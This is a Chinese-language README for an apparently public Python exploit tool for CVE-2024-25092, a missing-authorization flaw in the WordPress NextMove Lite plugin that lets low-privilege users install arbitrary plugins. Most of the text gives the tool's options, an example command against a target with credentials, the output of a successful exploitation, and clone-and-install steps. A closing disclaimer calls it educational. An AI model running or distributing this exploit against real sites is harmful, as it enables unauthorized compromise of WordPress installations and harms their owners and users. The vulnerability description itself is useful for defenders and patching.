CVE-2024-25092 是一个影响 WordPress NextMove Lite 插件(版本 <= 2.17.0)的高严重性漏洞。该漏洞允许订阅者级别及以上的用户在 WordPress 站点上安装和激活任意插件,原因是缺少授权检查。
XLPlugins NextMove Lite WordPress 插件存在缺少授权漏洞,允许具有订阅者级别或更高级别权限的认证用户执行任意插件安装和激活。这可能导致 WordPress 站点完全受损。
提供的 Python 脚本通过登录 WordPress 站点并安装指定插件来自动化利用此漏洞。
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help 显示此帮助信息并退出
-u URL, --url URL 目标 URL
-un USERNAME, --username USERNAME
用户名
-p PASSWORD, --password PASSWORD
密码
-pl PLUGIN, --plugin PLUGIN
要安装的插件(默认: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
登录成功。
站点存在漏洞...正在利用并上传插件
插件 'cart-for-woocommerce' 已成功安装并激活。
requests 库克隆仓库:
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
安装所需的 Python 包:
pip install requests
此脚本仅用于教育目的。请负责任地使用,并仅在你拥有明确权限的系统上使用。未经授权使用此脚本是非法且不道德的。